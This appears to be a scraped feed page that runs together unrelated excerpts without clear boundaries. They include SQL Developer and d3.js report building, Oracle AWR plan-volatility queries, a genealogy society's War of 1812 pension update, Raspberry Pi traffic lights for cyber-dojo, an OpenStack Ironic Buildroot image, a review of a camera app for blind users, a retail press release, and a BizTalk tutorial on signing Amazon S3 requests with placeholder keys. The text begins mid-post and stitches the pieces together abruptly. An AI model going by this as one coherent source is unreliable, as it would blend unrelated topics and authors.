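To make the data shape concrete, here is a small Python sketch (not part of the original post, which builds its JSON from the report's PL/SQL via DBMS_OUTPUT) of turning these manager/employee rows into the nodes/links structure that d3 force layouts typically consume:

import json

# (MGR_ENAME, ENAME) rows as returned by the query above (sample subset).
rows = [("KING", "JONES"), ("KING", "BLAKE"), ("JONES", "SCOTT"), ("SCOTT", "ADAMS")]

names = sorted({n for pair in rows for n in pair})
index = {name: i for i, name in enumerate(names)}

graph = {
    "nodes": [{"name": name} for name in names],
    "links": [{"source": index[mgr], "target": index[emp]} for mgr, emp in rows],
}
print(json.dumps(graph, indent=2))  # this JSON is what gets embedded in the generated HTML page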

Prototypes

I had already done a lot of work with d3 node graphs earlier this year so I started with some of my earlier prototypes and simplified them to the bare minimums.

Pop-Up Schemio V1

Pop-Up Schemio V5 - Click "Add Next Event" button to add objects to graph.

Construction

I usually prototype d3.js using tributary.io. It is a site where you can browse visualizations and build your own. Tributary has a secret superpower of its own - it is a live coding environment. Great for people like me who casually know 20 languages and the one I know best is pseudocode. While changing code in that environment you can easily see the effects of your changes without the normal edit/refresh cycle associated with web development.

The Difficult part

Here is the difficult part. Determining where all the code lives. SQL Developer can output raw HTML so I can go wild with DBMS_OUTPUT statements. I wanted to avoid embedding all of my custom javascript inside of DBMS_OUTPUT statements as it would be cumbersome to write and maintain. I decided I needed the following 4 things:
  • A HTML page generated from SQL Developer which contained a JSON representation of the data I wanted to use with d3.js
  • A reference to the d3.js library
  • A reference to a Style Sheet so I could make things pretty
  • A reference to my custom .JS code that I will keep on a web server accessible to me. This can either be internet or intranet availability, just depends on what controls you want to take with your code. Technically you could keep them on your local PC as well but sharing would be harder. If the external files are available on the net you can export your report definition and share with friends. If on your local PC you would need to make them a bundle and make sure the file paths in the parent HTML document are available on their systems as well.

    Building this yourself

    1) Put the mynodecode.css and mynodecode.js on a web server accessible to you and your users.

    2) Create a User Defined Report of type "PL/SQL DBMS_OUTPUT". Use the reportcode.sql source. Modify the paths to the .css and .js files as needed.

    3) Right click on the UDR and select "HTML..."

    4) Set DB connection, select "Open When Complete" and click Apply.

    5) SQL Developer will render the report to a local HTML file and fire up a browser to view it.

Refinement

The biggest challenge here was organization of the code. I wanted SQL Developer to be responsible for pushing the data required for the visualization and wanted to avoid wrapping any heavy logic into the SQL Developer User Defined Report itself. Review reportcode.sql to see the small amount of work I have SQL Developer contribute to this process.

v1 Result

Here is an example of the report running after everything is in place.


          August - Visualization 1 - SQL Execution Plan Volatility        

The first visualization I will be working on is something I have been wanting for a while. I need a way to quickly show SQL Statement performance over time for 1 statement, especially to identify Execution Plan volatility. When researching performance problems I often need to quickly digest historical performance of a trouble statement - a statement that usually has run fine for years but now has started acting up.

Luckily Oracle 10g/11g/12c has this type of information in the Automatic Workload Repository (AWR). If you are licensed, the DBA_HIST views are a treasure trove of useful performance information. Don't forget to up your default retention from 8 days to something larger. On my prod instances I usually set it to 400 days so I have a year's worth of performance data plus some padding.

Unluckily I have usually just seen this presented in tabular format with no easy way to gain some context.

My dream is to have some type of color map + bar graph hybrid which will allow me to see the difference between the worst and best execution plans and how often they are used when executing the SQL statement. Let's start working through the available data to see if I can reach that goal.

Research

To find out the SQL statements running in your database with the most volatile plans
-- For all AWR history, find SQL statements that have used more than 1 PLAN_HASH_VALUE
select sql_id, count(*) from (
select distinct sql_id, plan_hash_value from dba_hist_sqlstat)
group by sql_id
HAVING COUNT(*) > 1
ORDER BY 2 DESC;
Run this against one of your databases and you will find SQL statements that are recorded in AWR that use multiple plans.

Data Organization

DBA_HIST_SQLSTAT will be where we focus on getting our data. If you have the Diagnostics and Tuning packs then you can access this view via OEM or query it directly. A line is recorded for each sql_id, plan_hash_value combination that ran during the snap period. Details on the execution, including the number of times executed and the elapsed time, can be used to calculate an average elapsed time per execution. Since I am most interested in which plan_hash_values contribute to good and to bad performance, I have come up with this query to drive the visualization:
SELECT end_interval_time,
       sql_id,
       plan_hash_value,
       ROUND(elapsed_time_total/1000000,2) AS ElapsedTotal,
       executions_total,
       ROUND((elapsed_time_total/1000000)/executions_total,2) AS ElapsedPerExec
  FROM dba_hist_sqlstat JOIN dba_hist_snapshot
    ON dba_hist_sqlstat.snap_id=dba_hist_snapshot.snap_id
       AND dba_hist_sqlstat.instance_number=dba_hist_snapshot.instance_number
 WHERE sql_id IN (TRIM(:sql_id))
   AND executions_total       > 0
 ORDER BY DBA_HIST_SNAPSHOT.end_interval_time,
       DBA_HIST_SNAPSHOT.INSTANCE_NUMBER

Prototypes

My doodles are available here.

Construction

The SQL Developer DBMS_OUTPUT/HTML report type should have enough capabilities for me to get a basic version of this report across. In my dreams I have a full D3.JS interactive zoomable pannable graph available, but at this point I want to get a solid proof of concept running. The SQL Developer DBMS_OUTPUT/HTML report type will render basic HTML directly in a SQL Developer output window. The advantages are convenience and workflow, the disadvantages are that this rendering engine inside of SQL Developer is not as robust as a real browser. But I can do basic Font, Table, and CSS Styling to get my point across.

Refinement

Too many to list here, but the main difference from the prototypes is making the format an HTML table of horizontal bars. For SQL Developer HTML output it is just easier for now.

I didn't find an easy way to dynamically assign SQL plans to colors so I came up with my own crude mapper that uses the plan hash value. I wanted to make sure I created something in an anonymous PL/SQL block that had zero footprint... And hey this is my v1 :) If I end up implementing something browser based in Javascript I have better and more reliable ways to do this color assignment.
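As an aside, here is a tiny Python sketch of the kind of deterministic hash-to-color mapping described above. It is purely illustrative; the report itself does this in an anonymous PL/SQL block, and the exact scheme there may differ:

def plan_color(plan_hash_value: int) -> str:
    """Map a plan hash value to a stable CSS color by reusing its low-order bits."""
    r = (plan_hash_value >> 16) & 0xFF
    g = (plan_hash_value >> 8) & 0xFF
    b = plan_hash_value & 0xFF
    return f"#{r:02x}{g:02x}{b:02x}"

print(plan_color(3956160932))  # the same plan hash always gets the same color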

v1 Result

Since perfection is the enemy of delivering, here is an example and code for v1 of my graph:

Code is available here: AWRVolatilityColorMap-v1.sql

Please give it a try as a SQL Developer "DBMS_Output" report, or run it in SQL*Plus and spool the output to an HTML file, then open it with a browser to view the results.

To Do List

  • Pay more attention to time scale - v1 just serially lists all snaps that the SQL_ID appears in and sorts by snap_end_time descending.
  • Implement in d3 somehow - more on that in a future article
  • Add scales to improve readability

          An Update -- Document Conservation Resumes for War of 1812 Pension Files        

An Update -- Document Conservation Resumes for War of 1812 Pension Files

From our friends, at the Federation of Genealogical Societies (FGS), we have received an update on the War of 1812 Pension Files (Preserve the Pensions project).

Please do read this message in its entirety. It conveys a lot of important and vital information about this project from fundraising to a NARA security incident (which temporarily stopped a lot of projects including this one), and much more.

Today, the Federation of Genealogical Societies (FGS) announced the resumption of conservation of the War of 1812 Pension Files.

The Federation of Genealogical Societies (FGS) is pleased to announce National Archives staff have recently resumed document conservation of the War of 1812 Pension files covering surnames M(Moore)-Q. Document conservation is the essential first step in digitizing these files. Our digitization partner, Ancestry.com, has scheduled image capture of these newly conserved documents to begin the second week of September 2017. As capture resumes, new images will be added to Fold3.com on a rolling basis. The Federation and the dedicated volunteers of the Preserve the Pensions project have worked tirelessly for well over a year to negotiate a resolution to the work stoppage. This portion of the project plan is expected to be completed by third quarter 2018.

Many in our community have expressed frustration with the lack of new information on the status of the Preserve the Pensions project, ongoing negotiations and the safety of donated funds. As incoming President, I had an obligation to hold any response to those concerns until I could evaluate the history, speak candidly with the Preserve the Pensions team and meet with our partners. From the outside, and with perfect hindsight, it is easy to see a few opportunities missed to share more with you, our supporters. I stand behind the Preserve the Pensions team even so. They have worked incredibly hard to bring this unprecedented fundraising and preservation effort this far.

As frustrating as it may be to hear, FGS is limited in how much it can share with the community at large regarding ongoing negotiations with partners. As an organization, we most certainly may not reveal the internal discussions between our partners. That simple fact of business leaves you, our funding supporters, at times without satisfactory answers to your questions. While I will do everything in my power as FGS President to keep you apprised going forward, I will likely never satisfy your questions completely. With that in mind, and with the current project plan in place, I am able to share with you a very brief outline of events.

A security incident at the National Archives and Records Administration (NARA) facility in St. Louis led to a work stoppage of digitization projects for security review. This incident was unrelated to the Preserve the Pensions project in Washington, D.C.; however, our project was impacted. The Federal bureaucracy is a slow-moving beast, as many of us have experienced outside of genealogy. The completed review led to new security and project protocols. These protocols imposed new cost, space, and completion date constraints on the project. Neither conservation nor digitization could resume without a renegotiated project plan. These negotiations were difficult and time-consuming as each partner fought for their organization’s priorities. Ultimately, each partner compromised where they could to bring this important preservation project back online. The negotiations, however, are not over. The project plan above is a test of both the new project protocols and the compromises each of us made. It is a proof of concept. As this new project plan is put into practice, NARA, Ancestry.com, and FGS will continue to work together to evaluate the process with an eye towards negotiating the project plan for the final phase of conservation and digitization of surnames R-Z.

I can assure you, the funds you have so generously contributed to this effort are secure. In accordance with Generally Accepted Accounting Principles (GAAP), funds donated for a specific purpose must be separate from general operating funds. Your donations were deposited into a restricted fund. Any monies FGS provided for matching campaigns were moved from our operating capital into this restricted fund. Digitization and other project expenses were spent from the restricted fund.

While the total value of the project was originally projected to be $3.456 million, FGS was responsible for raising only half that amount - $1.728 million - due to the very generous match by Ancestry.com. This valuation was based on a projected 7.2 million pages in the War of 1812 Pensions collection at a total cost of $0.48 per page image. The new project plan has added to the total cost of the Preserve the Pensions project.  However, the number of images for the first half of the collection was less than originally expected.  We anticipate this trend will continue in the second half of the collection. Therefore, FGS stands by its decision to close community fundraising for the project.

On behalf of the board of the Federation and the dedicated volunteers of the Preserve the Pensions team, I have heard and acknowledge your concerns. Your support of this project has been both overwhelming and inspirational. As a first of its kind effort to crowdfund preservation of a genealogically-valuable collection, there was no roadmap. The Preserve the Pensions team is dedicated to seeing this project through until the very last page of the very last pension is online. We will evaluate the successes and shortcomings of the project as implemented before proceeding to a new project. In the meantime, we will work to regain your trust by being as forthcoming as the realities of these sensitive negotiations will allow.

FGS remains grateful to the community for your contributions; this project would not have been successful without the energy of all of you behind us. I welcome your questions or concerns at president@fgs.org.

--Rorey Cathcart, FGS President









          Market analyst predicts enterprise Linux surge        





This is a reported story from www.desktoplinux.com by researchers Bruce Guptill and Bill McNee.
According to their story, "Nearly half the world's large businesses will use Linux on desktops or in servers by the end of 2011, Saugatuck Technology predicts. 'The data are especially impressive when looking at the expected growth in the number of companies moving beyond proof of concept by the end of the decade,' the analyst firm said."

This isn't news to anyone who has been watching the impending ship date of Vista come forward like a creeping giant. With the need to upgrade to newer, more powerful computers just to run the new OS, and with still-lingering memories of the entire history of XP and the early web assaults, this is not completely unexpected news. Also, for those of you who read yesterday's blog, this is a hint at the reason Microsoft did the deal with Novell: the logic being, if you can't beat 'em, then join 'em. The long play here is Microsoft positioning themselves just in case of a market shift that they can't, even with all their money, stop from happening.
          Biotechnology Ignition Grant Scheme (BIG)        
The Biotechnology Ignition Grant (BIG) scheme is run by the Biotechnology Industry Research Assistance Council (BIRAC), Government of India. The scheme enables technology innovators and entrepreneurs to pursue a promising technology idea, and establish and validate proof of concept (POC) for the idea. By funding establishment and validation of POC, BIRAC wishes to help innovators and entrepreneurs ...
          cyber-dojo traffic-lights        
My friend Byran who works at the awesome Bluefruit Software in Redruth has hooked up his cyber-dojo web server to an actual traffic-light! Fantastic. Check out the video below :-)



Byran writes
It started out as a joke between myself and Josh (one of the testers at Bluefruit). I had the traffic lights in my office as I was preparing a stand to promote the outreach events (Summer Huddle, Mission to Mars, etc...) that Software Cornwall runs. The conversation went on to alternative uses for the traffic lights; I was planning to see if people would pay attention to the traffic lights if I put them in a corridor at the event. We then came up with the idea that we could use them to indicate TDD test status.
Although it started out as a joke I am going to use it at the Summer Huddle, the lights change every time anyone runs a test so it should give an idea of how the entire group are doing without highlighting an individual pair.
The software setup is very simple, there is a Python web server (using the Flask library) running on a Raspberry Pi that controls the traffic lights using GPIO Zero. When the appendTestTrafficLight() function (in run_tests.js.erb) appends the traffic light image to the webpage I made it send an http 'get' request to the Raspberry Pi web server to set the physical traffic lights at the same time. At the moment the IP address of the Raspberry Pi is hard coded in the 'run_tests.js.erb' file so I have to rebuild the web image if anything changes but it was only meant to be a joke/proof of concept. The code is on a branch called traffic_lights on my fork of the cyber-dojo web repository.
The hardware is also relatively simple, there is a converter board on the Pi; this only converts the IO pin output connector of the Raspberry Pi to the cable that attaches to the traffic lights.
The other end of the cable from the converter board attaches to the board in the top left of the inside the traffic lights; this has some optoisolators that drive the relays in the top right which in turn switch on and off the transformers (the red thing in the bottom left) that drive the lights.
I have to give credit to Steve Amor for building the hardware for the traffic lights. They are usually used during events we run to teach coding to children (and sometimes adults). The converter board has LEDs, switches and buzzers on it to show that there isn't a difference between writing software to toggle LEDs vs driving actual real world systems, it's just what's attached to the pin. Having something where they can run the same code to drive LEDs and drive real traffic lights helps to emphasise this point.
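For a sense of how little code such a setup needs, here is a minimal sketch of a Flask + GPIO Zero server along the lines Byran describes. This is not his actual code from the traffic_lights branch; the pin numbers and endpoint path are assumptions:

from flask import Flask
from gpiozero import LED

app = Flask(__name__)

# Pin numbers are assumptions; adjust to match the converter board wiring.
lights = {"red": LED(17), "amber": LED(27), "green": LED(22)}

@app.route("/set/<colour>")
def set_light(colour):
    """Turn on the requested light and switch the others off."""
    if colour not in lights:
        return "unknown colour", 404
    for name, led in lights.items():
        led.on() if name == colour else led.off()
    return "ok"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

The browser-side JavaScript would then just issue an HTTP GET to /set/red, /set/amber or /set/green whenever a test run completes.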



          Evaluator Group Announces Storage Specific Benchmark for Virtual Desktop Infrastructure, VDI-IOmark        

VDI-IOmark measures IO performance and streamlines proof of concept testing for VMware View environments.

(PRWeb August 02, 2011)

Read the full story at http://www.prweb.com/releases/2011/8/prweb8679296.htm


          Chris Smart: Creating an OpenStack Ironic deploy image with Buildroot        

Edit: See this post on how to automate the builds using buildimage scripts.

Ironic is an OpenStack project which provisions bare metal machines (as opposed to virtual).

A tool called Ironic Python Agent (IPA) is used to control and provision these physical nodes, performing tasks such as wiping the machine and writing an image to disk. This is done by booting a custom Linux kernel and initramfs image which runs IPA and connects back to the Ironic Conductor.

The Ironic project supports a couple of different image builders, including CoreOS, TinyCore and others via Disk Image Builder.

These have their limitations, however; for example, they require root privileges to be built and, with the exception of TinyCore, are all hundreds of megabytes in size. One of the downsides of TinyCore is limited hardware support and, although it's not used in production, it is used in the OpenStack gating tests (where it's booted in virtual machines with ~300MB RAM).

Large deployment images means a longer delay in the provisioning of nodes and so I set out to create a small, customisable image that solves the problems of the other existing images.

Buildroot

I chose to use Buildroot, a well regarded, simple to use tool for building embedded Linux images.

So far it has been quite successful as a proof of concept.

Customisation can be done via the menuconfig system, similar to the Linux kernel.

Buildroot menuconfig

Source code

All of the source code for building the image is up on my GitHub account in the ipa-buildroot repository. I have also written up documentation which should walk you through the whole build and customisation process.

The ipa-buildroot repository contains the IPA-specific Buildroot configurations and tracks upstream Buildroot in a Git submodule. By using upstream Buildroot and our external repository, the IPA Buildroot configuration comes up as an option for a regular Buildroot build.

IPA in list of Buildroot default configs

Buildroot will compile the kernel and initramfs, then post-build scripts clone the Ironic Python Agent repository and create Python wheels for the target.

This keeps the image highly flexible: you can specify the location and branch of the ironic-python-agent and requirements repositories to control which version of Ironic Python Agent is used.

Set Ironic Python Agent and Requirements location and Git version

I created the kernel config from scratch (using tinyconfig) and deliberately tried to balance size and functionality. It should boot on most Intel based machines (BIOS and UEFI), however hardware support like hard disk and ethernet controllers is deliberately limited. The goal was to start small and add more support as needed.

By using Buildroot, customising the Linux kernel is pretty easy! You can just run this to configure the kernel and rebuild your image:

make linux-menuconfig && make

If this interests you, please check it out! Any suggestions are welcome.


          Questions of Scripture        
I thought I had a script all worked out for my narrative version of Christ's Life. I put together a couple of "proof of concept" pieces and played them for CAC. There were some audio issues (I'm experimenting with different mic stands, but I'll get that worked out), but more to the point CAC wasn't thrilled about the language of the translation I'd used.

For various reasons I selected the King James Version. It would be recognizable and acceptable to a great many English-speaking Christians and it has the benefit of being in the public domain. CAC objected, though, on the grounds that the language is archaic. She would have preferred for me to use the New American Bible, but the copyright closes off that option.

(ASIDE: The podcast Verbum Domini ran into trouble with this last year. The USCCB essentially asked the host to cease and desist and subsequently started their own daily reading podcast. The whole thing was documented by Fr. Roderick on The Daily Breakfast. I can certainly understand why the Bishops would want to protect the copyright on the NAB, but the host of Verbum Domini did a great job. It would have been nice if he could have continued.)

That leaves me with limited options and I've spent much of the afternoon reading up on Bible history. Fascinating stuff. I've found that my best option is probably to use the Douay-Rheims version as it is a Catholic translation and was the basis of virtually all English Catholic bibles until the middle of the last century. I had heard of it, but I wasn't particularly familiar with the history behind it. The text itself is based on the Latin Vulgate translation by St. Jerome. The text was translated during the time when Catholics were being persecuted in England and priests were trained across the channel in Douay, France. There are plenty of web references, so I'll not bore you with them here. Suffice it to say that the interplay of personalities and texts is complex.

Copies of various versions of the Douay-Rheims can be found online, including one here (oddly, it's not in their drop-down list, but it can be found with a little digging) and here. The Douay-Rheims was replaced in America in the middle of the twentieth century by the Revised Standard Version -- Catholic Edition. I've found it online, but the copyright status is not entirely clear to me. More research is in order.

Oh, and while I was exploring I found a fellow named Jimmy Akin who has a fascinating story of Faith and conversion and a terrific page which explains his reasons for conversion. It was one of those wonderful little things that pops up when doing web research.
          Comment on Seeing AI: First Impressions by Marx Melencio        
I'm completely blind. I've been testing this rather heavily on my iPhone 6S for the past 3 days; here's what I think:

PROS
  • Remarkable Face Identification - For labeling faces with names; also works offline
  • Excellent Document OCR Prepping - Guidance for centering a document with text; doesn't work offline
  • Cool Document OCR Processing - For converting printed text to digital text, including formatting; doesn't work offline
  • Helpful Face / Person Localization Within Captured Scene - Provides location details of the detected face; also works offline
  • Good Short Text Recognition - Converts brief printed text into digital text, limited to around 12 to 20 characters or 2 to 4 words; works offline, though it can sometimes process 300 characters or more (only noticed this when online)
  • Decent Product Barcode Processing - Useful product details; only works online
  • Can be used to process photos / images stored across your other apps
  • It's free

CONS
  • Often Inaccurate Scene Recognition - Many errors and false positives when describing captured images; only works online
  • No location details for detected objects, just for persons / faces
  • Terrible Face Recognition - Persons need to be staring straight at the camera to be detected
  • Non-Intuitive Product Barcode Recognition - Difficult to guess where the barcode is despite a beeping sound to guide the user when a barcode is detected; only works online
  • Non-Intuitive Short Text OCR Processing - Doesn't provide guidance
  • Only available at the moment for iOS users in the US, Canada, New Zealand, India, Singapore and Hong Kong
  • Nothing at the moment for Android
  • No direct support for third-party wearable / spy cameras with earphone and mic - Quite inconvenient to take out your iPhone every time you need it, especially when walking around
  • Doesn't provide voice and camera gesture control

VERDICT
  • Similar sentiments to what this Mashable page said - "Microsoft's 'talking camera' app for the blind isn't as magical as it sounds. It needs some work": http://mashable.com/2017/07/12/microsoft-seeing-ai-app-for-blind/#7xAs9Y8zOsqT

I'm sure Microsoft'll be improving this in the next few months or so. Also: Just wanted to share a proof of concept prototype that I created, which I'm currently working on through a 0 equity inventor's grant from our national government's Department of Science & Technology for an AI software development and hardware device manufacturing project: https://www.youtube.com/watch?v=MXgW7folvps?rel=0
          Proof of Concept – Emulate NES Classic Using Raspberry Pi 3        
Revisions: 4/17/17: Initial release. Hey guys, If you haven’t heard, Nintendo discontinued the NES Classic! I was thinking of getting one for the longest time, and now it will be super hard because I am not going to fork over $200+ USD for 30 games! Well, I have a raspberry pi 3, and I followed […]
          Comment on How Much Power Does An Electric Bicycle Need? by Micah        
$200 is on the low end of what is possible. If this is just a proof of concept, finding some used batteries and building a custom friction drive using an old DC motor will likely be a good option. Look up "friction drive ebike" and you'll find many examples. Any ready-to-go ebike kit is going to break your $200 budget, so you're left with building something custom.
          Italian Consumer Electronics Retailer Unieuro SpA Drives Efficiency Through Supply Chain        

Anticipate Demand and Simplify Operations with a Unified View of Inventory

Consumer electronics retailer Unieuro SpA has purchased Oracle Retail Demand Forecasting and Oracle Retail Allocation & Replenishment to optimize stock levels, increase profitability and improve cash flow.

Unieuro aims at improving its centralized supply chain organization in order to support effective omnichannel replenishment processes including DOS, affiliate and online channels. With this initiative, Unieuro is in a stronger position to optimize the cross-channel opportunity to minimize stock, reduce obsolescence and streamline organizational costs. The supply chain organization will have the much needed visibility into demand coming from all touch points and to ultimately orchestrate the supply, reduce lost sales and increase customer satisfaction.

“Oracle Retail provides a distinctive replenishment approach for short lifecycle products which includes attribute based forecasting.” said Luigi Fusco, COO, Unieuro SpA. “We believe the optimized orchestration of the stock across channels will help improve our fulfillment rate to improve customer satisfaction and reduce obsolescence to eliminate costs.”

“After conducting a proof of concept with our data, Oracle Retail gained our confidence to move forward with the project. We validated our choice with customer references in the consumer electronics and hardlines businesses,” said Luca Girotti, IT Director, Unieuro. “We are thankful to the Sopra Steria team who helped us evaluate the market offerings and ultimately decide to move forward with the Oracle Retail solution.”

“Retailers like Unieuro can proactively position inventory in the right place in the right quantity by using analytic algorithms to drive accuracy and visibility. The visibility of this new supply chain organization will help Unieuro inspire consumer loyalty with a better in-stock position wherever they are inspired to shop,” said Ray Carlin, Senior Vice President and General Manager, Oracle Retail.

About Oracle Retail:

Oracle provides retailers with a complete, open, and integrated suite of best-of-breed business applications, cloud services, and hardware that are engineered to work together and empower commerce. Leading fashion, grocery, and specialty retailers use Oracle solutions to anticipate market changes, simplify operations and inspire authentic brand interactions. For more information, visit our website at www.oracle.com/retail.

About Oracle

The Oracle Cloud delivers hundreds of SaaS applications and enterprise-class PaaS and IaaS services to customers in more than 195 countries and territories while processing 55 billion transactions a day. For more information about Oracle (NYSE:ORCL), please visit us at oracle.com.

About Unieuro S.p.A.

Unieuro S.p.A. – with a widespread network of 460 outlets throughout the country, including direct stores (180) and affiliated stores (280), and its digital platform unieuro.it– is now the largest omnichannel distributor of consumer electronics and household appliances by number of outlets in Italy. Unieuro is headquartered in Forlì and has a logistics hub in Piacenza. It has more than 3,900 employees and revenues that exceeded € 1.6 billion for the year ending 28 February 2017.

 


          Proof of concept for blockchain implementation necessary and tricky        
To bring a blockchain implementation to fruition, CIOs will need to tee up a proof of concept and a field test before going to full production. It won't be easy.
          The Octinct Story        
Originally developed by Jonathan Guberman during the time I was working on the arduino monome project, the Tinct was a 4x4, fully PWM-adjustable color buttonpad designed to be compatible with the monome serial protocol. Eventually Jonathan designed a PCB and wrote a custom router and firmware. Once he had the software working properly, the proof of concept was the end of his desire to continue the project (not to mention serious school obligations).

Devon Jones breadboarded his Octinct as well and wrote a better-performing router in Python, all the while my Octinct remained in a drawer, soldered up but never functional due to my desire not to breadboard it. The Octinct uses 24-pin IDC cables which are fairly difficult to integrate into a breadboard unless you purchase specialized cables. The original intention was that Jonathan would eventually create a control board that would tie all the boards together, however it never developed. Similarly, at the time the wishes of the buttonpad's creator were that the buttonpads remain closed source.

After the popularity the arduinome received, I thought it was time to revisit the Octinct as something the monome community may have actual interest in.
          BizTalk 2013–Integration with Amazon S3 storage using the WebHttp Adapter        

I have recently encountered a requirement where we had to integrate a legacy Document Management system with Amazon in order to support a Mobile-Field Worker application.  The core requirement is that when a document reaches a certain state within the Document Management System, we need to publish this file to an S3 instance where it can be accessed from a mobile device.  We will do so using a RESTful PUT call.

Introduction to Amazon S3 SDK for .Net

Entering this solution I knew very little about Amazon S3.  I did know that it supported REST and therefore felt pretty confident that BizTalk 2013 could integrate with it using the WebHttp adapter.

The first thing that I needed to do was to create a Developer account on the Amazon platform. Once I created my account I then downloaded the Amazon S3 SDK for .Net. Since I will be using REST, this SDK is technically not required; however, there is a beneficial tool called the AWS Toolkit for Microsoft Visual Studio. Within this toolkit we can manage our various AWS services, including our S3 instance. We can create, read, update and delete documents using this tool. We can also use it in our testing to verify that a message has reached S3 successfully.

image

Another benefit of downloading the SDK is that we can use the managed libraries to manipulate S3 objects to better understand some of the terminology and functionality that is available. Another side benefit is that we can fire up Fiddler while we are using the SDK and see how Amazon forms its REST calls, under the hood, when communicating with S3.

Amazon S3 Accounts

When you sign up for an S3 account you will receive an Amazon Key ID and a Secret Access Key. These are two pieces of data that you will need in order to access your S3 services.  You can think of these credentials much like the ones you use when accessing Windows Azure Services.

image

BizTalk Solution

To keep this solution as simple as possible for this Blog Post, I have stripped some of the original components of the solution so that we can strictly focus on what is involved in getting the WebHttp Adapter to communicate with Amazon S3.

For the purpose of this blog post the following events will take place:

  1. We will receive a message that will be of type System.Xml.XmlDocument. Don’t let this mislead you: we can receive pretty much any type of message using this message type, including text documents, images and PDF documents.
  2. We will then construct a new instance of the message that we just received in order to manipulate some Adapter Context properties. You may now be asking – Why do I want to manipulate Adapter Context properties? The reason is that we want to change some of our HTTP header properties at runtime, and we therefore need to use a Dynamic Send Port, as identified by Ricardo Marques.

    image

    The most challenging part of this Message Assignment Shape was populating the WCF.HttpHeaders context property.  In C# if you want to populate headers you have a Header collection that you can populate in a very clean manner:

    headers.Add("x-amz-date", httpDate);

    However, when populating this property in BizTalk it isn’t as clean. You need to construct a string and append all of the related properties together. You also need to separate each header attribute onto a new line by appending “\n”.

    Tip: Don’t try to build this string in a Helper method.  \n characters will be encoded and the equivalent values will not be accepted by Amazon so that is why I have built out this string inside an Expression Shape.

    After I send a message (that I have tracked in BizTalk) I should see an HTTP header that looks like the following:

    <Property Name="HttpHeaders" Namespace="http://schemas.microsoft.com/BizTalk/2006/01/Adapters/WCF-properties" Value=

    "x-amz-acl: bucket-owner-full-control
    x-amz-storage-class: STANDARD
    x-amz-date: Tue, 10 Dec 2013 23:25:43 GMT
    Authorization: AWS <AmazonKeyID>:<EncryptedSignature>
    Content-Type: application/x-pdf
    Expect: 100-continue
    Connection: Keep-Alive"/>

    For the meaning of each of these headers I will refer you to the Amazon documentation. However, the one header that does warrant some additional discussion here is the Authorization header. This is how we authenticate with the S3 service. Constructing this string requires some additional understanding. To simplify the population of this value I have created the following helper method, which was adapted from the following post on StackOverflow:

    public static string SetHttpAuth(string httpDate)
    {
        string AWSAccessKeyId = "<your_keyId>";
        string AWSSecretKey = "<your_SecretKey>";

        string AuthHeader = "";
        string canonicalString = "PUT\n\napplication/x-pdf\n\nx-amz-acl:bucket-owner-full-control\nx-amz-date:" + httpDate + "\nx-amz-storage-class:STANDARD\n/<your_bucket>/310531500150800.PDF";

        // now encode the canonical string
        Encoding ae = new UTF8Encoding();
        // create a hashing object
        HMACSHA1 signature = new HMACSHA1();
        // secretId is the hash key
        signature.Key = ae.GetBytes(AWSSecretKey);
        byte[] bytes = ae.GetBytes(canonicalString);
        byte[] moreBytes = signature.ComputeHash(bytes);
        // convert the hash byte array into a base64 encoding
        string encodedCanonical = Convert.ToBase64String(moreBytes);
        // finally, this is the Authorization header.
        AuthHeader = "AWS " + AWSAccessKeyId + ":" + encodedCanonical;

        return AuthHeader;
    }

    The most important part of this method is the following line(s) of code:

    string canonicalString = "PUT\n\napplication/x-pdf\n\nx-amz-acl:bucket-owner-full-control\nx-amz-date:" + httpDate + "\nx-amz-storage-class:STANDARD\n/<your_bucket>/310531500150800.PDF";
                

    The best way to describe what is occurring is to borrow the following from the Amazon documentation.

    The Signature element is the RFC 2104 HMAC-SHA1 of selected elements from the request, and so the Signature part of the Authorization header will vary from request to request. If the request signature calculated by the system matches the Signature included with the request, the requester will have demonstrated possession of the AWS secret access key. The request will then be processed under the identity, and with the authority, of the developer to whom the key was issued.

    Essentially we are going to build up a string that reflects the various aspects of our REST call (headers, date, resource) and then create a hash of it using our Amazon secret. Since Amazon also knows our secret, they can compute the same signature and see if it matches our actual REST call. If it does – we are golden. If not, we can expect an error like the following:

    A message sent to adapter "WCF-WebHttp" on send port "SendToS3" with URI http://<bucketname>.s3-us-west-2.amazonaws.com/ is suspended.
    Error details: System.Net.WebException: The HTTP request was forbidden with client authentication scheme 'Anonymous'.
    <?xml version="1.0" encoding="UTF-8"?>
    <Error><Code>SignatureDoesNotMatch</Code><Message>The request signature we calculated does not match the signature you provided. Check your key and signing method.</Message><StringToSignBytes>50 55 54 0a 0a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 70 64 66 0a 0a 78 2d 61 6d 7a 2d 61 63 6c 3a 62 75 63 6b 65 74 2d 6f 77 6e 65 72 2d 66 75 6c 6c 2d 63 6f 6e 74 72 20 44 65 63 20 32 30 31 33 20 30 34 3a 35 37 3a 34 35 20 47 4d 54 0a 78 2d 61 6d 7a 2d 73 74 6f 72 61 67 65 2d 63 6c 61 73 73 3a 53 54 41 4e 44 41 52 44 0a 2f 74 72 61 6e 73 61 6c 74 61 70 6f 63 2f 33 31 30 35 33 31 35 30 30 31 35 30 38 30 30 2e 50 44 46</StringToSignBytes><RequestId>6A67D9A7EB007713</RequestId><HostId>BHkl1SCtSdgDUo/aCzmBpPmhSnrpghjA/L78WvpHbBX2f3xDW</HostId><SignatureProvided>SpCC3NpUkL0Z0hE9EI=</SignatureProvided><StringToSign>PUT

    application/x-pdf

    x-amz-acl:bucket-owner-full-control
    x-amz-date:Thu, 05 Dec 2013 04:57:45 GMT
    x-amz-storage-class:STANDARD
    /<bucketname>/310531500150800.PDF</StringToSign><AWSAccessKeyId><your_key></AWSAccessKeyId></Error>

    Tip: Pay attention to these error messages as they really give you a hint as to what you need to include in your “canonicalString”. I discounted these error messages early on and didn’t take the time to really understand what Amazon was looking for.

    For completeness I will include the other three helper methods that are being used in the Expression Shape. In my actual solution I have included these in a configuration store, but for the simplicity of this blog post I have hard-coded them.

    public static string SetAmzACL()
        {
            return "bucket-owner-full-control";
        }

        public static string SetStorageClass()
        {
            return "STANDARD";
        }

    public static string SetHeaderDate()
    {
        // Use GMT time and ensure that it is within 15 minutes of the time on Amazon’s servers
        return DateTime.UtcNow.ToString("ddd, dd MMM yyyy HH:mm:ss ") + "GMT";
    }

  3. The next part of the Message Assignment shape is setting the standard context properties for WebHttp Adapter.  Remember since we are using a Dynamic Send Port we will not be able to manipulate these values through the BizTalk Admin Console.

    msgS3Request(WCF.BindingType)="WCF-WebHttp";
